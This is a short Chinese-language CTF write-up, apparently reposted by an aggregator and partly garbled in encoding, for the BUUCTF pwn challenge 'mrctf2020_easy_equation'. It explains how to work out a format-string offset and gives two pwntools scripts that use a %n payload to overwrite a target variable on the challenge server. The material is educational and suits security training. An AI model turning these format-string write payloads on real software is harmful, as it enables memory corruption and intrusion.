這道題是個(gè)相對(duì)簡單的格式化字符串的題目, 但是做題過程中需要自己的一些debug調(diào)試查看;

計(jì)算偏移量

初看偏移量是8;

構(gòu)建初始payload,EXP;payload="aa%8$n"+p64(judge)

from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%8$n"+p64(judge) p.sendline(payload) p.interactive()

由于64位傳參，可能存在被/x00截?cái)嗟那闆r，

所以偏移這里是9

改payload="aa%9$nAAA"+p64(judge)

from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%9$nAAA"+p64(judge) p.sendline(payload) p.interactive()

AAA用來補(bǔ)站位;

%n：將%n之前printf已經(jīng)打印的字符個(gè)數(shù)賦值給偏移處指針?biāo)赶虻牡刂肺恢?/p>

總結(jié)

以上是生活随笔為你收集整理的BUUCTF(pwn)mrctf2020_easy_equation的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。